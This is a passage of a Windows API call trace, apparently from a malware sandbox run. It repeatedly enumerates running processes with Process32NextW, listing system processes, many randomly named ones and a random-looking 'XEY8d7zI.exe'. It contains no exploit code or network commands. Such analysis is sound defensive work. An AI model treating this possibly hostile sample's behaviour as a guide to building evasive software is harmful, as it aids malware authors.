th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.713] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.714] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.717] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.718] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.718] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.719] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.721] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.722] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.724] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.785] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0148.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.787] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.789] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.790] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.791] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.792] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.794] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.795] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.796] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.797] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.798] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.799] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.800] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.804] CloseHandle (hObject=0xc4) returned 1 [0148.804] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.809] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.866] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0148.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.875] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.876] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 